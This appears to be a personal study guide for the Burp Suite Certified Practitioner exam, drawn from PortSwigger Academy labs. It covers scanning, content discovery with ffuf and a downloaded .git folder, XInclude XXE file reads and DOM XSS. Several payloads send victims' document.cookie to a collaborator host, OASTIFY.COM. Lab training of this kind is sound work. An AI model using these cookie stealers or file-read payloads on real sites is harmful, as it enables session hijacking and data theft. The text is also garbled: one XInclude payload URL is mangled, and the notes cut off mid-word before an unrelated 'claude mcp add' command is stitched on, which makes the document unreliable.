This is my study notes with over a 110 PortSwigger Academy Labs. I used these labs to pass the Burp Suite Certified Practitioner Exam 2023. My BSCP qualification.
For more informaion go to PortSwigger Academy to get latest learning materials.
SCANNING - Enumeration
Focus Scanning
Scan non-standard entities
FOOTHOLD - Stage 1
Content Discovery
DOM-XSS
XSS Cross Site Scripting
Web Cache Poison
Host Headers
HTTP Request Smuggling
Brute force
Authentication
PRIVILEGE ESCALATION - Stage 2
CSRF - Account Takeover
Password Reset
SQLi - SQL Injection
JWT - JSON Web Tokens
Prototype pollution
API Testing
Access Control
GraphQL API Endpoints
CORS - Cross-origin resource sharing
DATA EXFILTRATION - Stage 3
XXE - XML entities & Injections
SSRF - Server side request forgery
SSTI - Server side template injection
SSPP - Server Side Prototype Pollution
LFI - File path traversal
File Uploads
Deserialization
OS Command Injection
APPENDIX
Python Scripts
Payloads
Word lists
Focus target scanning
Approach
Extra Training Content
I can recommend doing as many as possible Mystery lab challenge to test your skills and decrease the time it takes you to identify the vulnerabilities, before taking the exam.
I also found this PortSwigger advice on Retaking your exam very informative.
Watch CryptoCat - Burp Suite Certified Professional (BSCP) Review + Tips/Tricks for fresh view of the BSCP exam in 2024.
Thanks for the supported coffee,
\o/
My Burp Suite Certified Practitioner certificate.
Enumeration of the Web Applications start with initial and directed scanning in time limited engagement.
Focus Scanning
Scan non-standard entities
Due to the tight time limit during engagements or exam, scan defined insertion points for specific requests.
Scanner detected XML injection vulnerability on storeId parameter and this lead to reading the secret Carlos file.
<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="https://github.com/botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/raw/main/file:///home/carlos/secret"/></foo>
Out of band XInclude request, need hosted DTD to read local file.
<hqt xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://OASTIFY.COM/foo"/></hqt>
PortSwigger Lab: Discovering vulnerabilities quickly with targeted scanning
Scanning non-standard data structures using Burp feature to scan selected insertion point for select text in response or requests.
Identify the vulnerability through Burp scanner issue results.
In this case, using the identified XSS, Steal the admin user's cookies by crafting the payload in the identified insertion point.
'"><svg/onload=fetch(`//OASTIFY.COM/${encodeURIComponent(document.cookie)}`)>:CURRENT-USER-LOGIN-COOKIE-2ND-PART
Url encode key characters.
Use the admin user's cookie to access the admin panel by replacing it in the current browser session.
PortSwigger Lab: Scanning non-standard data structures
Enumeration of target start with fuzzing web directories and files. Either use the Burp engagement tools, content discovery option to find hidden paths and files or use
FFUFto enumerate web directories and files. Looking atrobots.txtorsitemap.xmlthat can reveal content.
wget https://raw.githubusercontent.com/botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/main/wordlists/burp-labs-wordlist.txt
ffuf -c -w ./burp-labs-wordlist.txt -u https://TARGET.web-security-academy.net/FUZZ
Burp engagement tool, content discovery using my compiled word list burp-labs-wordlist as custom file list.
Examine the git repo branches on local downloaded copy, using
git-colatool. Then select Undo last commit and extract admin password from the diff window.
wget -r https://TARGET.web-security-academy.net/.git/
git-cola --repo 0ad900ad039b4591c0a4f91b00a600e7.web-security-academy.net/
PortSwigger Lab: Information disclosure in version control history
Always open
source codeto look for any developer comments that reveal hidden files or paths. Below example lead to symphony token deserialization.
DOM XSS Indicators
DOM XSS Identified with DOM Invader
DOM XSS AngularJS
DOM XSS document.write in select
DOM XSS JSON.parse web messages
DOM XSS AddEventListener JavaScript URL
DOM XSS AddEventListener Ads Message
DOM XSS Eval Reflected Cookie Stealer
DOM XSS LastviewedProduct Cookie
DOM-based XSS vulnerabilities arise when JavaScript takes data from an attacker-controllable source, such as the URL, and passes code to a sink that supports dynamic code execution. Test which characters enable the escaping out of the
source codeinjection point, by using the fuzzer string below.
<>\'\"<script>{{7*7}}$(alert(1)}"-prompt(69)-"fuzzer
Review the
source codeto identify the sources , sinks or methods that may lead to exploit, list of samples:
Using Dom Invader plug-in and set the canary to value, such as
domxss, it will detect DOM-XSS sinks that can be exploit.
AngularJS expression below can be injected into the search function when angle brackets and double quotes HTML-encoded. The vulnerability is identified by noticing the search string is enclosed in an ng-app directive and
/js/angular 1-7-7.jsscript included. Review the HTML code to identify theng-appdirective telling AngularJS that this is the root element of the AngularJS application.
PortSwigger lab payload below:
{{$on.constructor('alert(1)')()}}
Cookie stealer payload using
on.constructorthat can be placed in iframe, hosted on an exploit server, resulting in the victim session cookie being send to Burp Collaborator.
PortSwigger cheat sheet for cross site scripting reference
{{$on.constructor('document.location="https://OASTIFY.COM?c="+document.cookie')()}}
Note: The session cookie property must not have the HttpOnly secure flag set in order for XSS to succeed.
PortSwigger Lab: DOM XSS in AngularJS expression with angle brackets and double quotes HTML-encoded
The target is vulnerable to DOM-XSS in the stock check function.
source coderevealdocument.writeis the sink used withlocation.searchallowing us to add storeId query parameter with a value containing the JavaScript payload inside a<select>statement.
Perform a test using below payload to identify the injection into the modified GET request, using
">to escape.
/product?productId=1&storeId=fuzzer"></select>fuzzer
DOM XSS cookie stealer payload in a
document.writesink using sourcelocation.searchinside a<select>element. This can be send to victim via exploit server in<iframe>. To test the cookie stealer payload I again on my browser in console added a test POC cookie to test sending it to Collaborator.
"></select><script>document.location='https://OASTIFY.COM/?domxss='+document.cookie</script>//
PortSwigger Lab: DOM XSS in document.write sink using source location.search inside a select element
Target use web messaging and parses the message as JSON.
Exploiting the vulnerability by constructing an HTML page on the exploit server,
that exploits DOM XSS vulnerability.
Rabbit hole: The CORS policy
No Access-Control-Allow-Originheader block access for Collaborator from able to access to fetch and cookie need insecure flags, look out Neo the Matrix.The vulnerable JavaScript code on the target using event listener that listens for a web message.
This event listener expects a string that is parsed using JSON.parse().Identify the
JSON.parse()in page code:
In the JavaScript below, identify the event listener expects a type property
and that the load-channel case of the switch statement changes the img src attribute.Identify web messages on target that is using
postmessage()with DOM Invader.
<script>
window.addEventListener('message', function(e) {
var img = document.createElement('img'), ACMEplayer = {element: img}, d;
document.body.appendChild(img);
try {
d = JSON.parse(e.data);
} catch(e) {
return;
}
switch(d.type) {
case "page-load":
ACMEplayer.element.scrollIntoView();
break;
case "load-channel":
ACMEplayer.element.src = d.url;
break;
case "player-height-changed":
ACMEplayer.element.style.width = d.width + "px";
ACMEplayer.element.style.height = d.height + "px";
break;
case "redirect":
window.location.replace(d.redirectUrl);
break;
}
}, false);
</script>
To exploit the abov
$ claude mcp add Burp-Suite-Certified-Practitioner-Exam-Study \
-- python -m otcore.mcp_server <graph>